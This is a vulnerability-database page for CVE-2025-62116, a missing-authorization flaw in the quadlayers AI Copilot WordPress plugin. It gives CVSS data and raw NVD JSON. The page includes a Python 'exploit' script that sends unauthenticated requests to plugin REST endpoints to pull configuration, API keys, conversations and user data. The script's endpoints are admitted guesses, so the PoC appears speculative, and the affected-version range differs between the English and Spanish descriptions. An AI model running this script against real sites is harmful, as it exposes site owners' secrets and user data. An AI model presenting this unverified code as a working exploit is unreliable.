Security Vulnerability Report
中文
CVE-2025-62116 CVSS 5.3 MEDIUM

CVE-2025-62116

Published: 2025-12-31 16:15:45
Last Modified: 2026-04-28 19:34:55

Description

Missing Authorization vulnerability in quadlayers AI Copilot ai-copilot allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AI Copilot: from n/a through <= 1.5.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

AI Copilot Plugin (quadlayers) <= 1.5.2
AI Copilot Plugin (quadlayers) from n/a through 1.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62116 PoC - WordPress AI Copilot Missing Authorization # Description: Unauthenticated access to privileged plugin functionality # Affected: AI Copilot Plugin <= 1.5.2 import requests import json TARGET_URL = "http://target-wordpress-site.com" PLUGIN_ENDPOINT = f"{TARGET_URL}/wp-json/ai-copilot/v1/" def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-62116""" # Enumerate vulnerable endpoints (specific endpoints depend on plugin version) vulnerable_endpoints = [ "config", "settings", "api-keys", "conversations", "user-data" ] results = [] for endpoint in vulnerable_endpoints: url = f"{PLUGIN_ENDPOINT}{endpoint}" # Send request WITHOUT authentication try: response = requests.get(url, timeout=10, verify=False) # Check if we can access the endpoint without auth if response.status_code == 200: results.append({ "endpoint": endpoint, "status": "VULNERABLE", "status_code": response.status_code, "response_preview": response.text[:200] if response.text else "" }) elif response.status_code == 401 or response.status_code == 403: results.append({ "endpoint": endpoint, "status": "PROTECTED", "status_code": response.status_code }) except requests.RequestException as e: results.append({ "endpoint": endpoint, "status": "ERROR", "error": str(e) }) return results def exploit_unauthorized_access(): """Demonstrate unauthorized data access""" # This PoC attempts to access sensitive plugin data without authentication # The actual exploitation depends on specific vulnerable endpoints exploit_payload = { "action": "get_config", "format": "json" } # Attempt unauthenticated request response = requests.post( f"{PLUGIN_ENDPOINT}config", json=exploit_payload, timeout=10 ) return { "status_code": response.status_code, "response": response.json() if response.headers.get('content-type', '').find('json') > -1 else response.text } if __name__ == "__main__": print("CVE-2025-62116 Vulnerability Checker") print("=" * 50) results = check_vulnerability() for result in results: print(f"\nEndpoint: {result['endpoint']}") print(f"Status: {result['status']}") if result['status'] == 'VULNERABLE': print("[!] Target is VULNERABLE to CVE-2025-62116") print(f"Response preview: {result.get('response_preview', 'N/A')}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62116", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:44.867", "lastModified": "2026-04-28T19:34:54.723", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in quadlayers AI Copilot ai-copilot allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AI Copilot: from n/a through <= 1.5.2."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en Quadlayers AI Copilot permite la Explotación de Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a AI Copilot: desde n/a hasta 1.4.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ai-copilot/vulnerability/wordpress-ai-copilot-plugin-1-4-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}